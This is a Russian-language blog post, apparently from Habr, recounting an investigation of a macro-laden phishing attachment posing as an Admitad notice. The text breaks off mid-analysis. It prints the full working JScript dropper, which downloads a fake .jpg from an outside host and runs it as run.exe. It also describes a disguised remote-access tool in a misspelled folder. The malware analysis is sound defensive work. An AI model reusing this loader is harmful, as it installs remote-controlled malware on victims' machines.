{"id":278089,"date":"2016-04-12T10:30:01","date_gmt":"2016-04-12T06:30:01","guid":{"rendered":"http:\/\/savepearlharbor.com\/?p=278089"},"modified":"-0001-11-30T00:00:00","modified_gmt":"-0001-11-29T21:00:00","slug":"","status":"publish","type":"post","link":"https:\/\/savepearlharbor.com\/?p=278089","title":{"rendered":"\u0421\u043e\u0432\u0440\u0435\u043c\u0435\u043d\u043d\u044b\u0439 \u0442\u0440\u043e\u044f\u043d\u0441\u043a\u0438\u0439 \u043a\u043e\u043d\u044c: \u0438\u0441\u0442\u043e\u0440\u0438\u044f \u043e\u0434\u043d\u043e\u0433\u043e \u0440\u0430\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u044f"},"content":{"rendered":"<p>       <a href=\"https:\/\/habrastorage.org\/files\/5a9\/38e\/ce1\/5a938ece14594edeb7911196fd4e9075.jpeg\"><\/p>\n<div style=\"text-align:center;\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/files\/e75\/1ea\/843\/e751ea843dde44a2857fce7624d785a0.jpeg\" \/><\/div>\n<p><\/a><br \/>  \u0412\u0441\u0435\u043c \u043f\u0440\u0438\u0432\u0435\u0442!<\/p>\n<p>  \u0421\u0435\u0433\u043e\u0434\u043d\u044f \u044f \u0440\u0430\u0441\u0441\u043a\u0430\u0436\u0443 \u0432\u0430\u043c \u043e\u0431 \u043e\u0434\u043d\u043e\u043c \u0442\u0440\u043e\u044f\u043d\u0441\u043a\u043e\u043c \u043a\u043e\u043d\u0435, \u0437\u0430\u0431\u0440\u0435\u0434\u0448\u0435\u043c \u0432 \u043e\u0433\u043e\u0440\u043e\u0434 \u043c\u043e\u0435\u0433\u043e \u043e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0435\u0433\u043e \u0437\u043d\u0430\u043a\u043e\u043c\u043e\u0433\u043e, \u043e \u0442\u043e\u043c, \u043a\u0430\u043a \u044f \u0432\u044b\u0433\u043e\u043d\u044f\u043b \u043d\u0435\u0437\u0432\u0430\u043d\u043e\u0433\u043e \u0433\u043e\u0441\u0442\u044f, \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u0443 \u043d\u0435\u0433\u043e \u0432\u043d\u0443\u0442\u0440\u0438 \u0438 \u043a\u0430\u043a\u0438\u0435 \u0443\u0440\u043e\u043a\u0438 \u0438\u0437 \u0432\u0441\u0435\u0433\u043e \u044d\u0442\u043e\u0433\u043e \u044f \u0432\u044b\u043d\u0435\u0441.<\/p>\n<p>  \u0415\u0441\u043b\u0438 \u0432\u0430\u043c \u0438\u043d\u0442\u0435\u0440\u0435\u0441\u043d\u043e \u2014 \u0434\u043e\u0431\u0440\u043e \u043f\u043e\u0436\u0430\u043b\u043e\u0432\u0430\u0442\u044c \u043f\u043e\u0434 \u043a\u0430\u0442!<br \/>  <a name=\"habracut\"><\/a>  <\/p>\n<h2>\u0427\u0430\u0441\u0442\u044c \u043f\u0435\u0440\u0432\u0430\u044f: \u043d\u0430\u0447\u0430\u043b\u043e<\/h2>\n<p>  \u041d\u0430\u0447\u0430\u043b\u043e\u0441\u044c \u0432\u0441\u0451 \u043d\u0435\u0434\u0435\u043b\u0438 \u0442\u0440\u0438 \u043d\u0430\u0437\u0430\u0434 \u0442\u0451\u043f\u043b\u044b\u043c \u0432\u0435\u0441\u0435\u043d\u043d\u0438\u043c \u0434\u043d\u0451\u043c, \u043a\u043e\u0433\u0434\u0430 \u043a\u043e \u043c\u043d\u0435 \u043f\u043e\u0437\u0432\u043e\u043d\u0438\u043b \u043c\u043e\u0439 \u043e\u0447\u0435\u043d\u044c \u0445\u043e\u0440\u043e\u0448\u0438\u0439 \u0437\u043d\u0430\u043a\u043e\u043c\u044b\u0439 \u0438 \u0440\u0430\u0441\u0441\u043a\u0430\u0437\u0430\u043b \u0432\u043e\u0442 \u0442\u0430\u043a\u0443\u044e \u0438\u0441\u0442\u043e\u0440\u0438\u044e: \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043c\u0438\u043d\u0443\u0442 \u043d\u0430\u0437\u0430\u0434 \u043e\u043d \u043f\u043e\u043b\u0443\u0447\u0438\u043b \u043d\u0430 email \u043f\u0438\u0441\u044c\u043c\u043e \u043e\u0442 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0438 Admitad, \u0441 \u043a\u043e\u0442\u043e\u0440\u043e\u0439 \u0443 \u043d\u0435\u0433\u043e \u0434\u0435\u043b\u043e\u0432\u044b\u0435 \u043e\u0442\u043d\u043e\u0448\u0435\u043d\u0438\u044f. \u041f\u0438\u0441\u044c\u043c\u043e \u0431\u044b\u043b\u043e \u0432\u043e\u0442 \u0442\u0430\u043a\u043e\u0433\u043e \u0441\u043e\u0434\u0435\u0440\u0436\u0430\u043d\u0438\u044f:<\/p>\n<p>  <code>\u0423\u0432\u0430\u0436\u0430\u0435\u043c\u044b\u0435 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u0438 Admitad \u0423\u0432\u0435\u0434\u043e\u043c\u043b\u044f\u0435\u043c \u0432\u0430\u0441 \u043e \u043d\u043e\u0432\u043e\u0432\u0432\u0435\u0434\u0435\u043d\u0438\u044f\u0445: \u0421 23.03.16 \u0418\u0437\u043c\u0435\u043d\u0451\u043d \u043f\u043e\u0440\u044f\u0434\u043e\u043a \u043d\u0430\u0447\u0438\u0441\u043b\u0435\u043d\u0438\u044f \u0442\u0440\u0430\u0444\u0438\u043a\u0430 \u0438 \u0441\u0438\u0441\u0442\u0435\u043c \u0432\u044b\u043f\u043b\u0430\u0442. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e \u0441\u043c. \u0412\u043b\u043e\u0436\u0435\u043d\u0438\u0435. \u0421 25.03.16 \u0432\u0432\u043e\u0434\u0438\u0442\u0441\u044f \u0441\u0438\u0441\u0442\u0435\u043c\u0430 \u043d\u0430\u043b\u043e\u0433\u043e\u043e\u0431\u043b\u0430\u0436\u0435\u043d\u0438\u044f (\u041d\u0414\u0421) \u043d\u0430 \u0432\u0441\u0435 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u044b AD. \u041f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0441\u0442\u0438 \u041d\u0414\u0421 \u0434\u043b\u044f \u043a\u0430\u0436\u0434\u043e\u0433\u043e \u0443\u0440\u043e\u0432\u043d\u044f \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 AD \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432\u043e \u0432\u043b\u043e\u0436\u0435\u043d\u0438\u0438. \u0421 \u0423\u0432\u0430\u0436\u0435\u043d\u0438\u0435\u043c Admitad Support.<\/code><\/p>\n<p>  \u041e\u0442\u043f\u0440\u0430\u0432\u0438\u0442\u0435\u043b\u0435\u043c \u0437\u043d\u0430\u0447\u0438\u043b\u0441\u044f Admitad Support. \u041d\u0443 \u0438, \u0435\u0441\u0442\u0435\u0441\u0442\u0432\u0435\u043d\u043d\u043e, \u043a \u043f\u0438\u0441\u044c\u043c\u0443 \u0431\u044b\u043b \u043f\u0440\u0438\u0430\u0442\u0442\u0430\u0447\u0435\u043d RAR-\u0430\u0440\u0445\u0438\u0432 \u0441 XLS-\u0444\u0430\u0439\u043b\u043e\u043c \u0432\u043d\u0443\u0442\u0440\u0438.<\/p>\n<p>  \u0410\u0440\u0445\u0438\u0432 \u043e\u043d, \u043a\u043e\u043d\u0435\u0447\u043d\u043e \u0436\u0435, \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u0430\u043b, XLS-\u0444\u0430\u0439\u043b \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u043b \u0438 (\u0442\u0430-\u0434\u0430\u0430\u0430\u0430!) \u0440\u0430\u0437\u0440\u0435\u0448\u0438\u043b \u0437\u0430\u043f\u0443\u0441\u043a \u043c\u0430\u043a\u0440\u043e\u0441\u043e\u0432, \u043f\u043e\u0442\u043e\u043c\u0443 \u0447\u0442\u043e Excel \u0432\u043c\u0435\u0441\u0442\u043e \u043e\u0436\u0438\u0434\u0430\u0435\u043c\u043e\u0439 \u0442\u0430\u0431\u043b\u0438\u0446\u044b \u043e\u0442\u043e\u0431\u0440\u0430\u0436\u0430\u043b \u043f\u0440\u043e\u0441\u0442\u0440\u0430\u043d\u043d\u043e\u0435 \u0442\u043e\u043b\u043a\u043e\u0432\u0430\u043d\u0438\u0435 \u043f\u0440\u043e \u043a\u0430\u043a\u0438\u0435-\u0442\u043e \u043c\u0430\u043a\u0440\u043e\u0441\u044b (\u0447\u0451\u0440\u0442 \u0435\u0433\u043e \u0437\u043d\u0430\u0435\u0442 \u2014 \u0447\u0442\u043e \u044d\u0442\u043e \u0442\u0430\u043a\u043e\u0435, \u0434\u0430 \u0438 \u0441\u043b\u043e\u0432\u043e \u043a\u0430\u043a\u043e\u0435-\u0442\u043e \u0434\u0443\u0440\u0430\u0446\u043a\u043e\u0435). \u041d\u0443 \u0438 \u043f\u043e\u0441\u043b\u0435 \u0442\u043e\u0433\u043e, \u043a\u0430\u043a \u043e\u043d \u0443\u0432\u0438\u0434\u0435\u043b \u043a\u0430\u043a\u043e\u0439-\u0442\u043e \u0441\u0447\u0451\u0442 \u043d\u0430 \u043e\u043f\u043b\u0430\u0442\u0443 \u0437\u0430 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 \u0432\u0438\u0434\u0435\u043e\u0440\u043e\u043b\u0438\u043a\u0430, \u043d\u0430\u0441\u0442\u0443\u043f\u0438\u043b\u043e \u043d\u0430\u043a\u043e\u043d\u0435\u0446-\u0442\u043e \u043f\u0440\u043e\u0437\u0440\u0435\u043d\u0438\u0435, \u0447\u0442\u043e \u0435\u0433\u043e \u0436\u0435\u0441\u0442\u043e\u043a\u043e \u043e\u0431\u043c\u0430\u043d\u0443\u043b\u0438. \u041e\u043d \u043f\u043e\u043d\u044f\u043b, \u0447\u0442\u043e \u0442\u043e\u043b\u044c\u043a\u043e \u0447\u0442\u043e \u043f\u043e\u0434\u0445\u0432\u0430\u0442\u0438\u043b \u043a\u0430\u043a\u0443\u044e-\u0442\u043e \u0438\u043d\u0444\u0435\u043a\u0446\u0438\u044e \u0438 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u043c\u0435\u043d\u044f \u0433\u043b\u044f\u043d\u0443\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440 \u2014 \u0447\u0442\u043e\u0431\u044b \u0438\u0437\u0431\u0430\u0432\u0438\u0442\u044c\u0441\u044f \u043e\u0442 \u043d\u0435\u0451.<\/p>\n<p>  \u042f \u0432\u044b\u0441\u043b\u0443\u0448\u0430\u043b \u0438\u0441\u0442\u043e\u0440\u0438\u044e, \u043f\u043e\u0436\u0443\u0440\u0438\u043b \u0435\u0433\u043e \u043d\u0435\u043c\u043d\u043e\u0433\u043e, \u043f\u043e\u0441\u043e\u0447\u0443\u0432\u0441\u0442\u0432\u043e\u0432\u0430\u043b \u0435\u043c\u0443 \u0438 \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442\u044c \u0422\u0438\u043c\u0432\u044c\u044e\u0432\u0435\u0440 \u2014 \u043f\u043e\u0442\u043e\u043c\u0443 \u043a\u0430\u043a \u0435\u0445\u0430\u0442\u044c \u0447\u0435\u0440\u0435\u0437 \u0432\u0435\u0441\u044c \u0433\u043e\u0440\u043e\u0434 \u0431\u044b\u043b\u043e \u043d\u0435\u0441\u043a\u043e\u043b\u044c\u043a\u043e \u043b\u0435\u043d\u0438\u0432\u043e.<\/p>\n<h2>\u0427\u0430\u0441\u0442\u044c \u0432\u0442\u043e\u0440\u0430\u044f: \u043f\u0435\u0440\u0432\u0438\u0447\u043d\u043e\u0435 \u043e\u0431\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435<\/h2>\n<p>  \u041f\u043e\u0434\u043a\u043b\u044e\u0447\u0438\u0432\u0448\u0438\u0441\u044c \u043a \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0443 \u0447\u0435\u0440\u0435\u0437 \u0422\u0438\u043c\u0432\u044c\u044e\u0432\u0435\u0440, \u044f \u043d\u0430\u0447\u0430\u043b \u043e\u0431\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u043d\u0438\u0435.<\/p>\n<p>  \u041f\u0435\u0440\u0432\u044b\u043c \u0434\u0435\u043b\u043e\u043c \u0430\u0442\u0442\u0430\u0447 \u0431\u044b\u043b \u043e\u0442\u043f\u0440\u0430\u0432\u043b\u0435\u043d \u043d\u0430 Virustotal: \u0440\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 0\/56. \u0421\u0432\u0435\u0436\u0430\u043a \u2014 \u043f\u043e\u0434\u0443\u043c\u0430\u043b \u044f.<br \/>  \u0417\u0430\u0442\u0435\u043c \u044f \u043d\u0430\u0447\u0430\u043b \u0438\u0441\u043a\u0430\u0442\u044c \u043d\u0430 \u0434\u0438\u0441\u043a\u0435 \u0441\u0432\u0435\u0436\u0438\u0435 \u0444\u0430\u0439\u043b\u044b. \u0422\u0430\u043a\u043e\u0432\u044b\u0435 \u043d\u0430\u0448\u043b\u0438\u0441\u044c \u0432 \u043f\u0430\u043f\u043a\u0435 temp: \u0442\u0430\u043c \u0441\u0440\u0435\u0434\u0438 \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0431\u0430\u0440\u0430\u0445\u043b\u0430 \u043b\u0435\u0436\u0430\u043b\u043e \u0434\u0432\u0430 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u043c\u044b\u0445 \u0444\u0430\u0439\u043b\u0430: run.exe \u0438 stream.js.<\/p>\n<div class=\"spoiler\"><b class=\"spoiler_title\">\u0412\u043e\u0442 \u0442\u0430\u043a \u0432\u044b\u0433\u043b\u044f\u0434\u0435\u043b \u0438\u0437\u043d\u0443\u0442\u0440\u0438 stream.js<\/b><\/p>\n<div class=\"spoiler_text\">\n<pre><code class=\"javascript\">(function (Global){  function CreateObject(ProgId) {  return new ActiveXObject(ProgId); }  var FSO = fso = CreateObject(&quot;Scripting.FileSystemObject&quot;); var WshShell = CreateObject(&quot;WScript.Shell&quot;);  function tmp() {  var uyeifds = new ActiveXObject(&quot;Shell.Application&quot;);  return uyeifds; }  function isFile(Path) {  Path = WshShell.ExpandEnvironmentStrings(Path);  return fso.FileExists(Path); }  function shl(rto) {  tmp().ShellExecute(rto,&quot;&quot;,&quot;&quot;,&quot;open&quot;,&quot;0&quot;); }  function DeleteFile(Path) {     if (\/Array\/i.test(Path.constructor+&quot;&quot;))     {   for (var i=0, l=Path.length;i&lt;l;i++)   DeleteFile(Path[i]);   return;     }   Path = WshShell.ExpandEnvironmentStrings(Path);  try  {   if (isFile(Path))   FSO.GetFile(Path).Delete(true);  } catch (e) {} }  function DownloadFileFromURL(Url, FileDest) {  var msx = &quot;Msxml2&quot;;  if (!FileDest || !Url) return null;   var ge = &quot;GE&quot;;   FileDest = WshShell.ExpandEnvironmentStrings(FileDest);  msx = msx + &quot;.XMLHTTP&quot;;  DeleteFile(FileDest);  var oXMLHTTP = WScript.CreateObject(msx);  oXMLHTTP.open (ge + &quot;T&quot;, Url, false);  oXMLHTTP.send(null);  var oADOStream = CreateObject(&quot;ADO&quot; + &quot;DB.Stream&quot;);  with (oADOStream){      Mode = 3;      Type = 1;      Open()      Write (oXMLHTTP.responseBody);      SaveToFile(FileDest, 2);      Close();      return FileDest;  } }  var tor1=&quot;%TMP%\\\\run.e&quot;; var tor2=&quot;xe&quot;;   try  {  FSO.GetFile(&quot;\\\\\\\\WORKOUT\\\\..hj&quot;);  } catch (e)  {   var Url=&quot;http:\/\/s2.zalivalka.ru\/download\/344314\/231.jpg&quot;;  DownloadFileFromURL(Url,tor1+tor2);   shl(WshShell.ExpandEnvironmentStrings(tor1+tor2));  } })(this) <\/code><\/pre>\n<p>  <\/div>\n<\/div>\n<p>  \u0411\u0435\u0433\u043b\u044b\u0439 \u043e\u0441\u043c\u043e\u0442\u0440 \u043f\u0430\u0446\u0438\u0435\u043d\u0442\u0430 \u0434\u0430\u043b \u043f\u043e\u043d\u044f\u0442\u044c, \u0447\u0442\u043e \u044d\u0442\u043e \u043f\u0440\u043e\u0441\u0442\u043e \u0437\u0430\u0433\u0440\u0443\u0437\u0447\u0438\u043a, \u043a\u043e\u0442\u043e\u0440\u044b\u0439 \u0433\u0440\u0443\u0437\u0438\u0442 \u0444\u0430\u0439\u043b htt\u0440:\/\/s2.zalivalka.ru\/download\/344314\/231.jpg, \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u044b\u0432\u0430\u0435\u0442 \u0435\u0433\u043e \u0432 run.exe \u0438 \u0437\u0430\u043f\u0443\u0441\u043a\u0430\u0435\u0442. \u0417\u0434\u0435\u0441\u044c \u0432 URL \u044f \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0437\u0430\u043c\u0435\u043d\u0438\u043b \u0432 \u0430\u0431\u0431\u0440\u0435\u0432\u0438\u0430\u0442\u0443\u0440\u0435 http \u043b\u0430\u0442\u0438\u043d\u0441\u043a\u0443\u044e &#8216;p&#8217; \u043d\u0430 \u0440\u0443\u0441\u0441\u043a\u0443\u044e &#8216;\u0440&#8217; \u2014 \u0447\u0442\u043e\u0431\u044b URL \u043d\u0435 \u043f\u0440\u0435\u0432\u0440\u0430\u0442\u0438\u043b\u0441\u044f \u0432 \u043b\u0438\u043d\u043a. \u041d\u0430 run.exe Virustotal \u0442\u0430\u043a\u0436\u0435 \u0441\u043a\u0440\u043e\u043c\u043d\u043e \u043d\u0435 \u043e\u0442\u0440\u0435\u0430\u0433\u0438\u0440\u043e\u0432\u0430\u043b.<\/p>\n<p>  \u041b\u0430\u0434\u043d\u043e \u2014 \u043f\u043e\u0434\u0443\u043c\u0430\u043b \u044f \u2014 \u0438 \u043f\u0440\u043e\u0434\u043e\u043b\u0436\u0438\u043b \u043f\u043e\u0438\u0441\u043a \u0441\u0432\u0435\u0436\u0438\u0445 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435. \u0421\u043a\u043e\u0440\u043e \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0430\u0441\u044c \u043f\u0430\u043f\u043a\u0430 &quot;%appdata%\\MicrocoftUpdate\\&quot; \u0441 \u043a\u0443\u0447\u043a\u043e\u0439 \u0444\u0430\u0439\u043b\u043e\u0432 \u0432\u043d\u0443\u0442\u0440\u0438. \u0414\u0430, \u0434\u0430, \u0438\u043c\u0435\u043d\u043d\u043e \u0442\u0430\u043a \u2014 Micro<u>c<\/u>oft \u2014 \u0447\u0435\u0440\u0435\u0437 &#8216;c&#8217;. \u0423\u0436 \u043d\u0435 \u0437\u043d\u0430\u044e \u2014 \u0441\u043f\u0435\u0446\u0438\u0430\u043b\u044c\u043d\u043e \u0431\u044b\u043b\u0430 \u0441\u0434\u0435\u043b\u0430\u043d\u0430 \u044d\u0442\u0430 \u043e\u0448\u0438\u0431\u043a\u0430 \u0438\u043b\u0438 \u043d\u0435\u0442, \u043d\u043e \u043e\u043d\u0430 \u0437\u043d\u0430\u0447\u0438\u0442\u0435\u043b\u044c\u043d\u043e \u043e\u0431\u043b\u0435\u0433\u0447\u0438\u043b\u0430 \u0434\u0430\u043b\u044c\u043d\u0435\u0439\u0448\u0438\u0439 \u043f\u043e\u0438\u0441\u043a \u0438\u0437\u043c\u0435\u043d\u0435\u043d\u0438\u0439, \u0432\u043d\u0435\u0441\u0451\u043d\u043d\u044b\u0445 \u0432 \u0440\u0435\u0435\u0441\u0442\u0440. \u0412 \u044d\u0442\u043e\u0439 \u043f\u0430\u043f\u043a\u0435 exe-\u0448\u043d\u0438\u043a \u0431\u044b\u043b \u0432\u0441\u0435\u0433\u043e \u043e\u0434\u0438\u043d: ctfmon.exe. \u0415\u0441\u043b\u0438 \u043a\u0442\u043e \u043f\u043e\u0434\u0437\u0430\u0431\u044b\u043b, \u0442\u043e \u043d\u0430\u043f\u043e\u043c\u043d\u044e, \u0447\u0442\u043e \u0442\u0430\u043a \u043a\u043e\u0433\u0434\u0430-\u0442\u043e \u043d\u0430\u0437\u044b\u0432\u0430\u043b\u0441\u044f \u043f\u0435\u0440\u0435\u043a\u043b\u044e\u0447\u0430\u0442\u0435\u043b\u044c \u0440\u0430\u0441\u043a\u043b\u0430\u0434\u043a\u0438 \u043a\u043b\u0430\u0432\u0438\u0430\u0442\u0443\u0440\u044b \u0432 \u041e\u0421 Windows XP.<\/p>\n<p>  \u0414\u043b\u044f \u043d\u0430\u0447\u0430\u043b\u0430 \u044f \u0440\u0435\u0448\u0438\u043b \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u044d\u0442\u0443 \u043f\u0430\u043f\u043a\u0443 \u2014 \u0447\u0442\u043e\u0431\u044b \u0432\u0438\u0440\u0443\u0441, \u043a\u043e\u0442\u043e\u0440\u043e\u0433\u043e \u044f \u0435\u0449\u0451 \u043d\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b, \u043d\u0435 \u0441\u043c\u043e\u0433 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u044c\u0441\u044f \u0444\u0430\u0439\u043b\u0430\u043c\u0438 \u0438\u0437 \u043d\u0435\u0451. \u041e\u0434\u043d\u0430\u043a\u043e \u043f\u043e\u043f\u044b\u0442\u043a\u0430 \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u0442\u044c \u043f\u0430\u043f\u043a\u0443 \u0437\u0430\u043a\u043e\u043d\u0447\u0438\u043b\u0430\u0441\u044c \u043d\u0435\u0443\u0434\u0430\u0447\u0435\u0439. \u0410 \u043d\u0435 cftmon.exe \u043b\u0438 \u0438\u0437 \u043d\u0435\u0451 \u0437\u0430\u043f\u0443\u0449\u0435\u043d \u0438 \u043d\u0435 \u0434\u0430\u0451\u0442 \u043c\u043d\u0435 \u044d\u0442\u043e\u0433\u043e \u0441\u0434\u0435\u043b\u0430\u0442\u044c? \u2014 \u043f\u043e\u0434\u0443\u043c\u0430\u043b \u044f. \u041e\u0442\u043a\u0440\u044b\u043b \u0434\u0438\u0441\u043f\u0435\u0442\u0447\u0435\u0440 \u0437\u0430\u0434\u0430\u0447 \u2014 \u043d\u0443 \u0442\u0430\u043a \u0438 \u0435\u0441\u0442\u044c \u2014 \u0432\u043e\u0442 \u043e\u043d, \u0440\u043e\u0434\u0438\u043c\u044b\u0439. \u0422\u0435\u0440\u043c\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043b \u0435\u0433\u043e \u0438 \u043f\u0430\u043f\u043a\u0430 \u043f\u043e\u0441\u043b\u0435 \u044d\u0442\u043e\u0433\u043e \u043f\u0435\u0440\u0435\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043b\u0430\u0441\u044c.<\/p>\n<p>  \u0417\u0430\u0442\u0435\u043c \u044f \u043e\u0442\u043f\u0440\u0430\u0432\u0438\u043b ctfmon.exe \u043d\u0430 Virustotal. \u0420\u0435\u0437\u0443\u043b\u044c\u0442\u0430\u0442 \u0431\u044b\u043b \u043d\u0435 \u043e\u0447\u0435\u043d\u044c \u0441\u0442\u0440\u0430\u0448\u043d\u044b\u0439 \u2014 \u0447\u0442\u043e-\u0442\u043e \u043e\u043a\u043e\u043b\u043e 5\/56, \u043f\u0440\u0438\u0447\u0451\u043c \u044d\u0442\u0438 \u043f\u044f\u0442\u0435\u0440\u043e \u0433\u043e\u0432\u043e\u0440\u0438\u043b\u0438 \u043e \u0442\u043e\u043c, \u0447\u0442\u043e \u044d\u0442\u043e \u043d\u0435 \u0432\u0438\u0440\u0443\u0441, \u0430 \u0442\u0430\u043a-\u043d\u0430\u0437\u044b\u0432\u0430\u0435\u043c\u043e\u0435 RiskWare \u2014 \u043b\u0435\u0433\u0430\u043b\u044c\u043d\u043e\u0435 \u043f\u0440\u043e\u0433\u0440\u0430\u043c\u043c\u043d\u043e\u0435 \u043e\u0431\u0435\u0441\u043f\u0435\u0447\u0435\u043d\u0438\u0435, \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u043c\u043e\u0435 \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u043c. \u0422\u043e\u0433\u0434\u0430 \u044f \u0432\u0435\u0440\u043d\u0443\u043b\u0441\u044f \u0432 \u043f\u0430\u043f\u043a\u0443 temp \u0438 \u0432 \u044d\u0442\u043e\u0442 \u043c\u043e\u043c\u0435\u043d\u0442 \u043f\u043e\u043d\u044f\u043b, \u0447\u0442\u043e \u0441\u043e\u0432\u0435\u0440\u0448\u0438\u043b \u0441\u0435\u0440\u044c\u0451\u0437\u043d\u0443\u044e \u043e\u0448\u0438\u0431\u043a\u0443: \u043f\u0430\u043f\u043a\u0430 \u0431\u044b\u043b\u0430 \u043f\u0443\u0441\u0442\u0430. \u041f\u0430\u0440\u0430\u043b\u043b\u0435\u043b\u044c\u043d\u043e \u0441\u043e \u043c\u043d\u043e\u0439 \u0432 \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u0435 \u043f\u043e\u043a\u043e\u043f\u0430\u043b\u0441\u044f \u043d\u0435\u043a\u0442\u043e, \u0441\u043e\u0431\u0440\u0430\u043b \u0432\u0441\u0451, \u0447\u0442\u043e \u0435\u043c\u0443 \u0431\u044b\u043b\u043e \u043d\u0443\u0436\u043d\u043e, \u0430\u043a\u043a\u0443\u0440\u0430\u0442\u043d\u043e \u043f\u0440\u0438\u0431\u0440\u0430\u043b\u0441\u044f \u0437\u0430 \u0441\u043e\u0431\u043e\u0439 \u0438 \u0443\u0448\u0451\u043b.<\/p>\n<p>  \u0427\u0451\u0440\u0442, \u0447\u0451\u0440\u0442, \u0447\u0451\u0440\u0442! \u041c\u043e\u044f \u043b\u0435\u043d\u044c \u0434\u0430\u043b\u0430 \u043d\u0435\u0434\u0440\u0443\u0433\u0443 \u0432\u043e\u0437\u043c\u043e\u0436\u043d\u043e\u0441\u0442\u044c \u0441\u0434\u0435\u043b\u0430\u0442\u044c \u0441\u0432\u043e\u0451 \u0447\u0451\u0440\u043d\u043e\u0435 \u0434\u0435\u043b\u043e. \u042f \u043d\u0430\u0431\u0440\u0430\u043b \u0442\u0435\u043b\u0435\u0444\u043e\u043d \u0437\u043d\u0430\u043a\u043e\u043c\u043e\u0433\u043e, \u043f\u043e\u043f\u0440\u043e\u0441\u0438\u043b \u0435\u0433\u043e \u0432\u044b\u043a\u043b\u044e\u0447\u0438\u0442\u044c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440, \u0432\u0437\u044f\u043b \u043d\u043e\u0443\u0442\u0431\u0443\u043a \u0438 \u043f\u043e\u0435\u0445\u0430\u043b \u043a \u043d\u0435\u043c\u0443 \u0434\u043e\u043c\u043e\u0439.<\/p>\n<h2>\u0427\u0430\u0441\u0442\u044c \u0442\u0440\u0435\u0442\u044c\u044f: \u043f\u0440\u0435\u043f\u0430\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u0435 \u043a\u043e\u043d\u044f<\/h2>\n<p>  \u0414\u043b\u044f \u043f\u0440\u043e\u0432\u0435\u0434\u0435\u043d\u0438\u044f \u0432\u0438\u0432\u0438\u0441\u0435\u043a\u0446\u0438\u0438 \u043d\u0430 \u043d\u043e\u0443\u0442\u0431\u0443\u043a \u0431\u044b\u043b\u0430 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0430 \u0432\u0438\u0440\u0442\u0443\u0430\u043b\u044c\u043d\u0430\u044f \u043c\u0430\u0448\u0438\u043d\u0430, \u043d\u0430 \u043a\u043e\u0442\u043e\u0440\u0443\u044e \u0431\u044b\u043b\u0438 \u043f\u043e\u0441\u0442\u0430\u0432\u043b\u0435\u043d\u044b Windows 7, Microsoft Office, Process Monitor \u0438 WireShark. \u0417\u0430\u043f\u0443\u0441\u0442\u0438\u0432 \u0432\u0438\u0440\u0443\u0441, \u044f \u043d\u0435\u043c\u043d\u043e\u0433\u043e \u043f\u043e\u0434\u043e\u0436\u0434\u0430\u043b \u2014 \u043a\u043e\u0433\u0434\u0430 \u043e\u043d \u0437\u0430\u043a\u043e\u043d\u0447\u0438\u0442 \u0432\u0441\u0435 \u0441\u0432\u043e\u0438 \u0434\u0435\u043b\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u0442\u0438\u0442 ctfmon.exe, \u043f\u043e\u0441\u043b\u0435 \u0447\u0435\u0433\u043e \u0442\u0435\u0440\u043c\u0438\u043d\u0438\u0440\u043e\u0432\u0430\u043b ctfmon \u0438 \u043f\u0440\u0438\u0441\u0442\u0443\u043f\u0438\u043b \u043a \u0438\u0437\u0443\u0447\u0435\u043d\u0438\u044e \u0441\u043e\u0431\u0440\u0430\u043d\u043d\u044b\u0445 \u043b\u043e\u0433\u043e\u0432.<\/p>\n<p>  \u0418\u0437 \u043b\u043e\u0433\u0430 Process Monitor-\u0430 \u0441\u043a\u043e\u0440\u043e \u0441\u0442\u0430\u043b\u043e \u043f\u043e\u043d\u044f\u0442\u043d\u043e, \u0447\u0442\u043e run.exe \u2014 \u044d\u0442\u043e 